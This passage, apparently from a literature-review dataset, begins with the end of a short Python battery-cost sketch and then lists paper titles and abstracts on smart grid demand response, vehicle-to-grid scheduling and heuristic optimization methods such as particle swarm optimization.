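    cost_with_batt += price * (demand + u) # grid purchase this slot
    cost_no_batt += price * demand

print(f"cost with battery: {cost_with_batt:.2f}  without: {cost_no_batt:.2f}")
```

The point of the sketch is only the structure: each slot's decision depends on the current price and state of charge, never on future information.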
--- paper_title: Analyzing the system effects of optimal demand response utilization for reserve procurement and peak clipping paper_content: In this paper the effect of demand response (DR) resource utilization in system operation is analyzed by using an optimization-based simultaneous market clearing framework. Two distinct utilization patterns in which DR can be involved are reserve supply by Reserve Supplying Demand Response (RSDR) and actual curtailment for demand reduction or peak clipping by Peak Clipping Demand Response (PCDR). The provider of RSDR will sell its ability to tolerate probable curtailment and the PCDR will sell its real curtailment ability. These utilizations have different effects on system indices. Therefore, the effects of different DR utilization patterns are analyzed and compared in this paper. The IEEE RTS is selected as the test case for studying the effect of DR utilization patterns. --- paper_title: An optimal scheduling problem in distribution networks considering V2G paper_content: This paper addresses the problem of energy resource scheduling. An aggregator will manage all distributed resources connected to its distribution network, including distributed generation based on renewable energy resources, demand response, storage systems, and electrical gridable vehicles. The use of gridable vehicles will have a significant impact on power systems management, especially in distribution networks. Therefore, the inclusion of vehicles in the optimal scheduling problem will be very important in future network management. The proposed particle swarm optimization approach is compared with a reference methodology based on mixed integer non-linear programming, implemented in GAMS, to evaluate the effectiveness of the proposed methodology. The paper includes a case study that considers a 32 bus distribution network with 66 distributed generators, 32 loads and 50 electric vehicles. --- paper_title: Optimal Residential Load Control With Price Prediction in Real-Time Electricity Pricing Environments paper_content: Real-time electricity pricing models can potentially lead to economic and environmental advantages compared to the current common flat rates. In particular, they can provide end users with the opportunity to reduce their electricity expenditures by responding to pricing that varies with different times of the day. However, recent studies have revealed that the lack of knowledge among users about how to respond to time-varying prices as well as the lack of effective building automation systems are two major barriers for fully utilizing the potential benefits of real-time pricing tariffs. We tackle these problems by proposing an optimal and automatic residential energy consumption scheduling framework which attempts to achieve a desired trade-off between minimizing the electricity payment and minimizing the waiting time for the operation of each appliance in the household in the presence of a real-time pricing tariff combined with inclining block rates. Our design requires minimum effort from the users and is based on simple linear programming computations. Moreover, we argue that any residential load control strategy in real-time electricity pricing environments requires price prediction capabilities. This is particularly true if the utility companies provide price information only one or two hours ahead of time.
By applying a simple and efficient weighted average price prediction filter to the actual hourly-based price values used by the Illinois Power Company from January 2007 to December 2009, we obtain the optimal choices of the coefficients for each day of the week to be used by the price predictor filter. Simulation results show that the combination of the proposed energy consumption scheduling design and the price predictor filter leads to significant reduction not only in users' payments but also in the resulting peak-to-average ratio in load demand for various load scenarios. Therefore, the deployment of the proposed optimal energy consumption scheduling schemes is beneficial for both end users and utility companies. --- paper_title: Particle swarm optimization paper_content: Particle swarm optimization (PSO) has undergone many changes since its introduction in 1995. As researchers have learned about the technique, they have derived new versions, developed new applications, and published theoretical studies of the effects of the various parameters and aspects of the algorithm. This paper comprises a snapshot of particle swarming from the authors' perspective, including variations in the algorithm, current and ongoing research, applications and open problems. --- paper_title: Near optimal demand-side energy management under real-time demand-response pricing paper_content: In this paper, we present demand-side energy management under real-time demand-response pricing as a task scheduling problem which is NP-hard. Using minmax as the objective, we show that the schedule produced by our minMax scheduling algorithm has a number of salient advantages: significant peak-shaving, cost reduction, and risk-aversion for the consumers. We prove that our algorithm finds near-optimal solutions and our simulation study shows that the actual performance is better than the worst-case bound. The algorithm is simple to implement and efficient at the scale of large enterprises. --- paper_title: Appliance commitment for household load scheduling paper_content: This paper presents a novel appliance commitment algorithm that schedules thermostatically controlled household loads based on price and consumption forecasts, considering users' comfort settings, to meet an optimization objective such as minimum payment or maximum comfort. The formulation of an appliance commitment problem is described using an electrical water heater load as an example. The thermal dynamics of heating and coasting of the water heater load is modeled by physical models; random hot water consumption is modeled with statistical methods. The models are used to predict the appliance operation over the scheduling time horizon. User comfort is transformed to a set of linear constraints. Then, a novel linear-sequential-optimization-enhanced, multiloop algorithm is used to solve the appliance commitment problem. The simulation results demonstrate that the algorithm is fast, robust, and flexible. The algorithm can be used in home/building energy-management systems to help household owners or building managers to automatically create optimal load operation schedules based on different cost and comfort settings and compare cost/benefits among schedules. --- paper_title: Residential demand response with interruptible tasks: Duality and algorithms paper_content: This paper deals with optimal scheduling of demand response in a residential setup when the electricity prices are known ahead of time.
Each end-user has a “must-run” load, and two types of adjustable loads. The first type must consume a specified total amount of energy over the scheduling horizon, but its consumption can be adjusted across the horizon. The second type of load has adjustable power consumption without a total energy requirement, but operation of the load at reduced power results in dissatisfaction of the end-user. Each adjustable load is interruptible in the sense that the load can be either operated (resulting in nonzero power consumption), or not operated (resulting in zero power consumption). Examples of such adjustable interruptible loads are charging a plugin hybrid electric vehicle or operating a pool pump. The problem amounts to minimizing the cost of electricity plus user dissatisfaction, subject to individual load consumption constraints. The problem is nonconvex, but surprisingly it is shown to have zero duality gap if a continuous-time horizon is considered. This opens up the possibility of using Lagrangian dual algorithms without loss of optimality in order to come up with efficient demand response scheduling schemes. --- paper_title: Demand Side Management in Smart Grid Using Heuristic Optimization paper_content: Demand side management (DSM) is one of the important functions in a smart grid that allows customers to make informed decisions regarding their energy consumption, and helps the energy providers reduce the peak load demand and reshape the load profile. This results in increased sustainability of the smart grid, as well as reduced overall operational cost and carbon emission levels. Most of the existing demand side management strategies used in traditional energy management systems employ system specific techniques and algorithms. In addition, the existing strategies handle only a limited number of controllable loads of limited types. This paper presents a demand side management strategy based on load shifting technique for demand side management of future smart grids with a large number of devices of several types. The day-ahead load shifting technique proposed in this paper is mathematically formulated as a minimization problem. A heuristic-based Evolutionary Algorithm (EA) that easily adapts heuristics in the problem was developed for solving this minimization problem. Simulations were carried out on a smart grid which contains a variety of loads in three service areas, one with residential customers, another with commercial customers, and the third one with industrial customers. The simulation results show that the proposed demand side management strategy achieves substantial savings, while reducing the peak load demand of the smart grid. --- paper_title: Intelligent energy resource management considering vehicle-to-grid: A Simulated Annealing approach paper_content: This paper proposes a simulated annealing (SA) approach to address energy resources management from the point of view of a virtual power player (VPP) operating in a smart grid. Distributed generation, demand response, and gridable vehicles are intelligently managed on a multiperiod basis according to V2G users' profiles and requirements. Apart from using the aggregated resources, the VPP can also purchase additional energy from a set of external suppliers. The paper includes a case study for a 33 bus distribution network with 66 generators, 32 loads, and 1000 gridable vehicles. The results of the SA approach are compared with a methodology based on mixed-integer nonlinear programming. 
A variation of this method, using ac load flow, is also used and the results are compared with the SA solution using network simulation. The proposed SA approach proved to be able to obtain good solutions in low execution times, providing VPPs with suitable decision support for the management of a large number of distributed resources. --- paper_title: A demand side management based simulation platform incorporating heuristic optimization for management of household appliances paper_content: Abstract Demand-Side Management (DSM) can be defined as the implementation of policies and measures to control, regulate, and reduce energy consumption. This paper introduces dynamic distributed resource management and optimized operation of household appliances in a DSM based simulation tool. The principal purpose of the simulation tool is to illustrate customer-driven DSM operation, and evaluate an estimate for home electricity consumption while minimizing the customer’s cost. A heuristic optimization algorithm i.e. Binary Particle Swarm Optimization (BPSO) is used for the optimization of DSM operation in the tool. The tool also simulates the operation of household appliances as a Hybrid Renewable Energy System (HRES). The resource management technique is implemented using an optimization algorithm, i.e. Particle Swarm Optimization (PSO), which determines the distribution of energy obtained from various sources depending on the load. The validity of the tool is illustrated through an example case study for various household situations. --- paper_title: Demand Response Optimization for Smart Home Scheduling Under Real-Time Pricing paper_content: Demand response (DR) is very important in the future smart grid, aiming to encourage consumers to reduce their demand during peak load hours. However, if binary decision variables are needed to specify start-up time of a particular appliance, the resulting mixed integer combinatorial problem is in general difficult to solve. In this paper, we study a versatile convex programming (CP) DR optimization framework for the automatic load management of various household appliances in a smart home. In particular, an L1 regularization technique is proposed to deal with schedule-based appliances (SAs), for which their on/off statuses are governed by binary decision variables. By relaxing these variables from integer to continuous values, the problem is reformulated as a new CP problem with an additional L1 regularization term in the objective. This allows us to transform the original mixed integer problem into a standard CP problem. Its major advantage is that the overall DR optimization problem remains to be convex and therefore the solution can be found efficiently. Moreover, a wide variety of appliances with different characteristics can be flexibly incorporated. Simulation result shows that the energy scheduling of SAs and other appliances can be determined simultaneously using the proposed CP formulation. --- paper_title: The technical, economic and commercial viability of the vehicle-to-grid concept paper_content: The idea that electric vehicles can be used to supply power to the grid for stabilisation and peak time supply is compelling, especially in regions where traditional forms of storage, back up or peaking supply are unavailable or expensive. A number of variants of the vehicle-to-grid theme have been proposed and prototypes have proven that the technological means to deliver many of these are available. 
This study reviews the most popular variants and investigates their viability using Western Australia, the smallest wholesale electricity market in the world, as an extreme test case. Geographical and electrical isolation prevents the trade of energy and ancillary services with neighbouring regions and the flat landscape prohibits hydroelectric storage. Hot summers and the widespread use of air-conditioning mean that peak energy demand is a growing issue, and the ongoing addition to already underutilised generation and transmission capacity is unsustainable. The report concludes that most variants of vehicle-to-grid currently require too much additional infrastructure investment, carry significant risk and are too costly to implement in the light of alternative options. Charging electric vehicles can, however, be added to planned demand side management schemes without the need for additional capital investment. --- paper_title: Efficient Utilization of Renewable Energy Sources by Gridable Vehicles in Cyber-Physical Energy Systems paper_content: The main sources of emission today are the electric power and transportation sectors. One of the main goals of a cyber-physical energy system (CPES) is the integration of renewable energy sources and gridable vehicles (GVs) to maximize emission reduction. GVs can be used as loads, sources and energy storages in a CPES. A large CPES is very complex considering all conventional and green distributed energy resources, dynamic data from sensors, and smart operations (e.g., charging/discharging, control, etc.) from/to the grid to reduce both cost and emission. If a large number of GVs are connected to the electric grid randomly, the peak load will be very high. Using conventional thermal power plants to sustain this electrified transportation will be economically expensive and environmentally unfriendly. Intelligent scheduling and control of the elements of energy systems have great potential for evolving a sustainable integrated electricity and transportation infrastructure. The maximum utilization of renewable energy sources using GVs for a sustainable CPES (minimum cost and emission) is presented in this paper. Three models are described, and the results of the smart grid model show the highest potential for sustainability. --- paper_title: Intelligent unit commitment with vehicle-to-grid —A cost-emission optimization paper_content: A gridable vehicle (GV) can be used as a small portable power plant (S3P) to enhance the security and reliability of utility grids. Vehicle-to-grid (V2G) technology has drawn great interest in recent years and its success depends on intelligent scheduling of GVs or S3Ps in constrained parking lots. V2G can reduce dependencies on small expensive units in existing power systems, resulting in reduced operation cost and emissions. It can also increase the reserve and reliability of existing power systems. Intelligent unit commitment (UC) with V2G for cost and emission optimization in power systems is presented in this paper. As the number of gridable vehicles in V2G is much higher than the number of small units in existing systems, UC with V2G is more complex than basic UC for only thermal units. Particle swarm optimization (PSO) is proposed to balance between cost and emission reductions for UC with V2G. PSO can reliably and accurately solve this complex constrained optimization problem easily and quickly. In the proposed solution model, binary PSO optimizes the on/off states of power generating units easily.
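The binary PSO mentioned in the sentence above can be sketched generically: velocities are updated as in ordinary PSO and then squashed through a sigmoid into bit-flip probabilities for the on/off decisions. The toy unit data, penalty and swarm parameters below are invented for illustration and are not the balanced hybrid PSO of that paper.

```python
import math
import random

random.seed(1)

CAP  = [100, 80, 60, 40, 30]       # unit capacities (MW), assumed values
COST = [1.0, 1.2, 1.5, 2.0, 2.5]   # running cost per unit, assumed values
DEMAND = 180                        # demand to cover (MW)

def cost(bits):
    """Toy unit-commitment cost: running cost plus a penalty for unmet demand."""
    supplied = sum(c for c, b in zip(CAP, bits) if b)
    running = sum(k for k, b in zip(COST, bits) if b)
    return running + 10.0 * max(0, DEMAND - supplied)

def sigmoid(v):
    return 1.0 / (1.0 + math.exp(-v))

N, D, ITERS = 12, len(CAP), 60      # swarm size, bit-string length, iterations
W, C1, C2 = 0.7, 1.5, 1.5           # inertia, cognitive and social weights

x = [[random.randint(0, 1) for _ in range(D)] for _ in range(N)]
v = [[0.0] * D for _ in range(N)]
pbest = [row[:] for row in x]
pbest_cost = [cost(row) for row in x]
g = min(range(N), key=lambda i: pbest_cost[i])
gbest, gbest_cost = pbest[g][:], pbest_cost[g]

for _ in range(ITERS):
    for i in range(N):
        for d in range(D):
            r1, r2 = random.random(), random.random()
            v[i][d] = (W * v[i][d]
                       + C1 * r1 * (pbest[i][d] - x[i][d])
                       + C2 * r2 * (gbest[d] - x[i][d]))
            # binary PSO: the velocity is squashed into a bit-flip probability
            x[i][d] = 1 if random.random() < sigmoid(v[i][d]) else 0
        c = cost(x[i])
        if c < pbest_cost[i]:
            pbest[i], pbest_cost[i] = x[i][:], c
            if c < gbest_cost:
                gbest, gbest_cost = x[i][:], c

print("best on/off pattern:", gbest, "cost:", gbest_cost)
```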
Vehicles are represented by integer numbers instead of zeros and ones to reduce the dimension of the problem. Balanced hybrid PSO optimizes the number of gridable vehicles of V2G in the constrained parking lots. Balanced PSO provides a balance between local and global searching abilities, and finds a balance in reducing both operation cost and emission. Results show a considerable amount of cost and emission reduction with intelligent UC with V2G. Finally, the practicality of UC with V2G is discussed for real-world applications. --- paper_title: Using fleets of electric-drive vehicles for grid support paper_content: Electric-drive vehicles can provide power to the electric grid when they are parked (vehicle-to-grid power). We evaluated the economic potential of two utility-owned fleets of battery-electric vehicles to provide power for a specific electricity market, regulation, in four US regional regulation services markets. The two battery-electric fleet cases are: (a) 100 Th!nk City vehicles and (b) 252 Toyota RAV4 vehicles. Important variables are: (a) the market value of regulation services, (b) the power capacity (kW) of the electrical connections and wiring, and (c) the energy capacity (kWh) of the vehicle's battery. With a few exceptions when the annual market value of regulation was low, we find that vehicle-to-grid power for regulation services is profitable across all four markets analyzed. Assuming no more than current Level 2 charging infrastructure (6.6 kW), the annual net profit for the Th!nk City fleet is from US$ 7000 to 70,000 providing regulation down only. For the RAV4 fleet the annual net profit ranges from US$ 24,000 to 260,000 providing regulation down and up. Vehicle-to-grid power could provide a significant revenue stream that would improve the economics of grid-connected electric-drive vehicles and further encourage their adoption. It would also improve the stability of the electrical grid. --- paper_title: Combined Operations of Renewable Energy Systems and Responsive Demand in a Smart Grid paper_content: The integration of renewable energy systems (RESs) in smart grids (SGs) is a challenging task, mainly due to the intermittent and unpredictable nature of the sources, typically wind or sun. Another issue concerns the way to support the consumers' participation in the electricity market aiming at minimizing the costs of the global energy consumption. This paper proposes an energy management system (EMS) aiming at optimizing the SG's operation. The EMS behaves as a sort of aggregator of distributed energy resources allowing the SG to participate in the open market. By integrating demand side management (DSM) and active management schemes (AMS), it allows a better exploitation of renewable energy sources and a reduction of the customers' energy consumption costs with both economic and environmental benefits. It can also improve the grid resilience and flexibility through the active participation of distribution system operators (DSOs) and electricity supply/demand that, according to their preferences and costs, respond to real-time price signals using market processes. The efficiency of the proposed EMS is verified on a 23-bus 11-kV distribution network. --- paper_title: Review of the Impact of Vehicle-to-Grid Technologies on Distribution Systems and Utility Interfaces paper_content: Plug-in vehicles can behave either as loads or as a distributed energy and power resource in a concept known as vehicle-to-grid (V2G) connection.
This paper reviews the current status and implementation impact of V2G/grid-to-vehicle (G2V) technologies on distributed systems, requirements, benefits, challenges, and strategies for V2G interfaces of both individual vehicles and fleets. The V2G concept can improve the performance of the electricity grid in areas such as efficiency, stability, and reliability. A V2G-capable vehicle offers reactive power support, active power regulation, tracking of variable renewable energy sources, load balancing, and current harmonic filtering. These technologies can enable ancillary services, such as voltage and frequency control and spinning reserve. Costs of V2G include battery degradation, the need for intensive communication between the vehicles and the grid, effects on grid distribution equipment, infrastructure changes, and social, political, cultural, and technical obstacles. Although V2G operation can reduce the lifetime of vehicle batteries, it is projected to become economical for vehicle owners and grid operators. Components and unidirectional/bidirectional power flow technologies of V2G systems, individual and aggregated structures, and charging/recharging frequency and strategies (uncoordinated/coordinated smart) are addressed. Three elements are required for successful V2G operation: power connection to the grid, control and communication between vehicles and the grid operator, and on-board/off-board intelligent metering. Success of the V2G concept depends on standardization of requirements and infrastructure decisions, battery technology, and efficient and smart scheduling of limited fast-charge infrastructure. A charging/discharging infrastructure must be deployed. Economic benefits of V2G technologies depend on vehicle aggregation and charging/recharging frequency and strategies. The benefits will receive increased attention from grid operators and vehicle owners in the future. --- paper_title: Real-time vehicle-to-grid control algorithm under price uncertainty paper_content: The vehicle-to-grid (V2G) system enables energy flow from the electric vehicles (EVs) to the grid. The distributed power of the EVs can either be sold to the grid or be used to provide frequency regulation service when V2G is implemented. A V2G control algorithm is necessary to decide whether the EV should be charged, discharged, or provide frequency regulation service in each hour. The V2G control problem is further complicated by the price uncertainty, where the electricity price is determined dynamically every hour. In this paper, we study the real-time V2G control problem under price uncertainty. We model the electricity price as a Markov chain with unknown transition probabilities and formulate the problem as a Markov decision process (MDP). This model features implicit estimation of the impact of future electricity prices and current control operation on long-term profits. The Q-learning algorithm is then used to adapt the control operation to the hourly available price in order to maximize the profit for the EV owner during the whole parking time. We evaluate our proposed V2G control algorithm using both the simulated price and the actual price from PJM in 2010. Simulation results show that our proposed algorithm can work effectively in the real electricity market and it is able to increase the profit significantly compared with the conventional EV charging scheme. 
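The MDP-plus-Q-learning control loop described in the entry above can be illustrated with a stripped-down tabular version. The price levels, transition matrix, battery discretization and rewards below are invented, and the real formulation also covers frequency-regulation revenue, which is omitted here.

```python
import random

random.seed(2)

# Tabular Q-learning for hourly charge/idle/discharge decisions under a
# Markov price, loosely following the MDP framing of the entry above.
PRICES = [0.10, 0.20, 0.35]                  # $/kWh price levels (states), assumed
P_TRANS = [[0.6, 0.3, 0.1],                  # toy Markov chain over price levels
           [0.25, 0.5, 0.25],
           [0.1, 0.3, 0.6]]
SOC_LEVELS = 5                               # battery discretized to 0..4 units
ACTIONS = [-1, 0, +1]                        # discharge, idle, charge (1 unit = 5 kWh)
ALPHA, GAMMA, EPS = 0.1, 0.95, 0.1

Q = {(p, s): [0.0, 0.0, 0.0] for p in range(len(PRICES)) for s in range(SOC_LEVELS)}

def step(price_idx, soc, action):
    """Apply one action; return (reward, next_price_idx, next_soc)."""
    delta = ACTIONS[action]
    if soc + delta < 0 or soc + delta >= SOC_LEVELS:
        delta = 0                            # infeasible moves become idle
    energy = 5.0 * delta                     # kWh bought (+) or sold (-)
    reward = -PRICES[price_idx] * energy     # pay to charge, earn to discharge
    nxt = random.choices(range(len(PRICES)), weights=P_TRANS[price_idx])[0]
    return reward, nxt, soc + delta

price_idx, soc = 1, 2
for t in range(50_000):
    if random.random() < EPS:
        a = random.randrange(3)
    else:
        a = max(range(3), key=lambda k: Q[(price_idx, soc)][k])
    r, nxt_price, nxt_soc = step(price_idx, soc, a)
    target = r + GAMMA * max(Q[(nxt_price, nxt_soc)])
    Q[(price_idx, soc)][a] += ALPHA * (target - Q[(price_idx, soc)][a])
    price_idx, soc = nxt_price, nxt_soc

# After training, the greedy policy typically buys at the low price and sells at the high one.
for p in range(len(PRICES)):
    row = [["sell", "idle", "buy"][max(range(3), key=lambda k: Q[(p, s)][k])]
           for s in range(SOC_LEVELS)]
    print(f"price {PRICES[p]:.2f}: {row}")
```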
--- paper_title: A day-ahead electricity pricing model based on smart metering and demand-side management paper_content: Several factors support more deployment of real-time pricing (RTP); including recent developments in the area of smart metering, regulators interest in promoting demand response programs and well-organized electricity markets. This paper first reviews time-based electricity pricing and the main barriers and issues to fully unleash benefits of RTP programs. Then, a day-ahead real-time pricing (DA-RTP) model is proposed, which addresses some of these issues. The proposed model can assist a retail energy provider and/or a distribution company (DISCO) to offer optimal DA hourly prices using smart metering. The real-time prices are determined through an optimization problem which seeks to maximize the electricity provider's profit, while considering consumers' benefit, minimum daily energy consumption, consumer response to posted electricity prices, and distribution network constraints. The numerical results associated with Ontario electricity tariffs indicate that instead of directly posting DA market prices to consumers, it would be better to calculate optimal prices which would yield higher benefit both for the energy provider and consumers. --- paper_title: Optimal Charging Strategies for Unidirectional Vehicle-to-Grid paper_content: Vehicle-to-grid (V2G) has been proposed as a way to increase the adoption rate of electric vehicles (EVs). Unidirectional V2G is especially attractive because it requires little if any additional infrastructure other than communication between the EV and an aggregator. The aggregator in turn combines the capacity of many EVs to bid into energy markets. In this work an algorithm for unidirectional regulation is developed for use by an aggregator. Several smart charging algorithms are used to set the point about which the rate of charge varies while performing regulation. An aggregator profit maximization algorithm is formulated with optional system load and price constraints analogous to the smart charging algorithms. Simulations on a hypothetical group of 10 000 commuter EVs in the Pacific Northwest verify that the optimal algorithms increase aggregator profits while reducing system load impacts and customer costs. --- paper_title: Coordinated Scheduling of Residential Distributed Energy Resources to Optimize Smart Home Energy Services paper_content: We describe algorithmic enhancements to a decision-support tool that residential consumers can utilize to optimize their acquisition of electrical energy services. The decision-support tool optimizes energy services provision by enabling end users to first assign values to desired energy services, and then scheduling their available distributed energy resources (DER) to maximize net benefits. We chose particle swarm optimization (PSO) to solve the corresponding optimization problem because of its straightforward implementation and demonstrated ability to generate near-optimal schedules within manageable computation times. We improve the basic formulation of cooperative PSO by introducing stochastic repulsion among the particles. The improved DER schedules are then used to investigate the potential consumer value added by coordinated DER scheduling. This is computed by comparing the end-user costs obtained with the enhanced algorithm simultaneously scheduling all DER, against the costs when each DER schedule is solved separately. 
This comparison enables the end users to determine whether their mix of energy service needs, available DER and electricity tariff arrangements might warrant solving the more complex coordinated scheduling problem, or instead, decomposing the problem into multiple simpler optimizations. --- paper_title: Concurrent optimization of consumer's electrical energy bill and producer's power generation cost under a dynamic pricing model paper_content: Demand response is a key element of the smart grid technologies. This is a particularly interesting problem with the use of dynamic energy pricing schemes, which incentivize electricity consumers to consume electricity more prudently in order to minimize their electric bill. On the other hand, optimizing the number and production time of power generation facilities is a key challenge. In this paper, three models are presented for consumers, utility companies, and a third-party arbiter to optimize the cost to the parties individually and in combination. Our models are of high quality and exhibit superior performance, thanks to a realistic treatment of non-cooperative energy buyers and sellers and real-time feedback from their interactions. Simulation results show that the energy consumption distribution becomes very stable during the day when our models are used, while consumers and utility companies pay lower costs. --- paper_title: Optimal demand response using mechanism design in the smart grid paper_content: Demand side management is considered to be a key component in the future smart grid that can help to achieve an efficient utilization of energy. In this paper we consider a residential power network, where consumers are asked to report their information about power usage to the service provider, and the provider then determines the optimal power allocations and charges for each user based on social welfare maximization. The benefit of each user is related to its demand for electricity and the quantity of power allocated. Assuming consumers are strategic and selfish, we propose an efficient pricing algorithm with which consumers cannot achieve greater benefit by misreporting and social welfare maximization can be achieved. Finally we present simulation results to show that our proposed method can benefit both the service provider and consumers.
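The mechanism-design entries in this part of the literature allocate energy from reported utilities and then charge each user the externality it imposes on the others, so that truthful reporting is a best strategy. The following toy VCG computation (quadratic utilities, one capacity constraint, invented numbers) illustrates the idea; it is not the specific pricing algorithm of the paper above.

```python
# Toy VCG mechanism: allocate a capped energy supply from reported quadratic
# utilities u_i(x) = a_i*x - 0.5*b_i*x^2, then charge each user the externality
# it imposes on the others. Illustrative only; all parameters are invented.
CAPACITY = 10.0
USERS = {"u1": (8.0, 1.0), "u2": (6.0, 1.0), "u3": (4.0, 2.0)}   # name: (a, b)

def allocate(users, capacity):
    """Welfare-maximizing allocation via bisection on the shadow price lam."""
    def demand(lam):
        return {n: max(0.0, (a - lam) / b) for n, (a, b) in users.items()}
    if sum(demand(0.0).values()) <= capacity:
        return demand(0.0)
    lo, hi = 0.0, max(a for a, _ in users.values())
    for _ in range(60):                      # bisection on the dual price
        mid = 0.5 * (lo + hi)
        if sum(demand(mid).values()) > capacity:
            lo = mid
        else:
            hi = mid
    return demand(hi)

def welfare(users, alloc):
    return sum(a * alloc[n] - 0.5 * b * alloc[n] ** 2 for n, (a, b) in users.items())

alloc = allocate(USERS, CAPACITY)
for name in USERS:
    others = {n: p for n, p in USERS.items() if n != name}
    # VCG payment: best welfare the others could get without me,
    # minus the welfare the others actually get when I am present.
    without_me = welfare(others, allocate(others, CAPACITY))
    with_me = welfare(others, {n: alloc[n] for n in others})
    payment = without_me - with_me
    print(f"{name}: gets {alloc[name]:.2f} kWh, pays {payment:.2f}")
```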
--- paper_title: Optimal Scheduling of Vehicle-to-Grid Energy and Ancillary Services paper_content: Vehicle-to-grid (V2G), the provision of energy and ancillary services from an electric vehicle (EV) to the grid, has the potential to offer financial benefits to EV owners and system benefits to utilities. In this work a V2G algorithm is developed to optimize energy and ancillary services scheduling. The ancillary services considered are load regulation and spinning reserves. The algorithm is developed to be used by an aggregator, which may be a utility or a third party. This algorithm maximizes profits to the aggregator while providing additional system flexibility and peak load shaving to the utility and low costs of EV charging to the customer. The formulation also takes into account unplanned EV departures during the contract periods and compensates accordingly. Simulations using a hypothetical group of 10 000 commuter EVs in the ERCOT system using different battery replacement costs demonstrate these significant benefits. --- paper_title: Advanced Demand Side Management for the Future Smart Grid Using Mechanism Design paper_content: In the future smart grid, both users and power companies can potentially benefit from the economical and environmental advantages of smart pricing methods to more effectively reflect the fluctuations of the wholesale price into the customer side. In addition, smart pricing can be used to seek social benefits and to implement social objectives. To achieve social objectives, the utility company may need to collect various information about users and their energy consumption behavior, which can be challenging. In this paper, we propose an efficient pricing method to tackle this problem. We assume that each user is equipped with an energy consumption controller (ECC) as part of its smart meter. All smart meters are connected to not only the power grid but also a communication infrastructure. This allows two-way communication among smart meters and the utility company. We analytically model each user's preferences and energy consumption patterns in form of a utility function. Based on this model, we propose a Vickrey-Clarke-Groves (VCG) mechanism which aims to maximize the social welfare, i.e., the aggregate utility functions of all users minus the total energy cost. Our design requires that each user provides some information about its energy demand. In return, the energy provider will determine each user's electricity bill payment. Finally, we verify some important properties of our proposed VCG mechanism for demand side management such as efficiency, user truthfulness, and nonnegative transfer. Simulation results confirm that the proposed pricing method can benefit both users and utility companies. --- paper_title: Multi-period optimal energy procurement and demand response in smart grid with uncertain supply paper_content: We propose a simple model that integrates two-period electricity markets, uncertainty in renewable generation, and real-time dynamic demand response. A load-serving entity decides its day-ahead procurement to optimize expected social welfare a day before energy delivery. At delivery time when renewable generation is realized, it sets prices to manage demand and purchase additional power on the real-time market, if necessary, to balance supply and demand. We derive the optimal day-ahead decision, propose real-time demand response algorithm, and study the effect of volume and variability of renewable generation on the social welfare. 
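The two-settlement structure in the entry above (commit a day-ahead quantity, then balance in real time once the renewable output is realized) can be mimicked with a small sample-average search. The prices, demand level and wind distribution below are invented, and the paper derives its optimum analytically rather than by the grid search used here.

```python
import random

random.seed(3)

P_DA, P_RT = 40.0, 90.0        # day-ahead and (higher) real-time price, $/MWh, assumed
DEMAND = 100.0                 # aggregate demand to serve (MWh), assumed fixed
WIND = [random.uniform(0.0, 60.0) for _ in range(5000)]   # sampled wind scenarios

def expected_cost(q_da):
    """Day-ahead purchase cost plus expected real-time balancing cost.

    Over-procured energy is simply wasted here (no resale), so buying too much
    day ahead is penalized as well as buying too little."""
    total = 0.0
    for w in WIND:
        shortfall = max(0.0, DEMAND - w - q_da)   # bought at the real-time price
        total += P_DA * q_da + P_RT * shortfall
    return total / len(WIND)

# crude one-dimensional search over candidate day-ahead quantities
best_q = min(range(0, 101), key=expected_cost)
print(f"day-ahead purchase: {best_q} MWh, expected cost: {expected_cost(best_q):.0f} $")
```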
--- paper_title: Intelligent Scheduling of Hybrid and Electric Vehicle Storage Capacity in a Parking Lot for Profit Maximization in Grid Power Transactions paper_content: This paper proposes an intelligent method for scheduling usage of available energy storage capacity from plug-in hybrid electric vehicles (PHEV) and electric vehicles (EV). The batteries on these vehicles can either provide power to the grid when parked, known as vehicle-to-grid (V2G) concept or take power from the grid to charge the batteries on the vehicles. A scalable parking lot model is developed with different parameters assigned to fleets of vehicles. The size of the parking lot is assumed to be large enough to accommodate the number of vehicles performing grid transactions. In order to figure out the appropriate charge and discharge times throughout the day, binary particle swarm optimization is applied. Price curves from the California ISO database are used in this study to have realistic price fluctuations. Finding optimal solutions that maximize profits to vehicle owners while satisfying system and vehicle owners constraints is the objective of this study. Different fleets of vehicles are used to approximate varying customer base and demonstrate the scalability of parking lots for V2G. The results are compared for consistency and scalability. Discussions on how this technique can be applied to other grid issues such as peaking power are included at the end. --- paper_title: A microgrid energy management system for inducing optimal demand response paper_content: This paper focuses on optimal operation schedule of a Microgrid that is interconnected to the power grid. We develop a mathematical model to compute the optimal operation schedule that embodies demand response. Integer Programming optimization is used to this end. Our model incorporates the electricity load into three types: fixed, transferable, and user-action loads. The transferable load plays a key role in molding demand response. Experimental results show that the proposed model exploits the demand elasticity and significantly reduces the total operation cost. Also observed from the experiments are the impact of the uncertainty in renewable distributed generators on operation schedule and total cost and the role of power storages for enhancing the demand elasticity with respect to user-action loads and for reserving power against high price. --- paper_title: An integrated approach for distributed energy resource short term scheduling in smart grids considering realistic power system simulation paper_content: Abstract The large increase of distributed energy resources, including distributed generation, storage systems and demand response, especially in distribution networks, makes the management of the available resources a more complex and crucial process. With wind based generation gaining relevance, in terms of the generation mix, the fact that wind forecasting accuracy rapidly drops with the increase of the forecast anticipation time requires to undertake short-term and very short-term re-scheduling so the final implemented solution enables the lowest possible operation costs. This paper proposes a methodology for energy resource scheduling in smart grids, considering day ahead, hour ahead and five minutes ahead scheduling. The short-term scheduling, undertaken five minutes ahead, takes advantage of the high accuracy of the very-short term wind forecasting providing the user with more efficient scheduling solutions. 
The proposed method uses a Genetic Algorithm based approach for optimization that is able to cope with the hard execution time constraint of short-term scheduling. Realistic power system simulation, based on PSCAD®, is used to validate the obtained solutions. The paper includes a case study with a 33 bus distribution network with high penetration of distributed energy resources implemented in PSCAD®. --- paper_title: Distributed energy resource short-term scheduling using Signaled Particle Swarm Optimization paper_content: Distributed Energy Resources (DER) scheduling in smart grids presents a new challenge to system operators. The increase in new resources, such as storage systems and demand response programs, results in additional computational effort for optimization problems. On the other hand, since natural resources, such as wind and sun, can only be precisely forecasted with short anticipation, short-term scheduling is especially relevant, requiring very good performance on large dimension problems. Traditional techniques such as Mixed-Integer Non-Linear Programming (MINLP) do not cope well with large scale problems. This type of problem can be appropriately addressed by metaheuristic approaches. This paper proposes a new methodology called Signaled Particle Swarm Optimization (SiPSO) to address the energy resources management problem in the scope of smart grids, with intensive use of DER. The proposed methodology's performance is illustrated by a case study with 99 distributed generators, 208 loads, and 27 storage units. The results are compared with those obtained by other methodologies, namely MINLP, Genetic Algorithm, original Particle Swarm Optimization (PSO), Evolutionary PSO, and New PSO. SiPSO performance 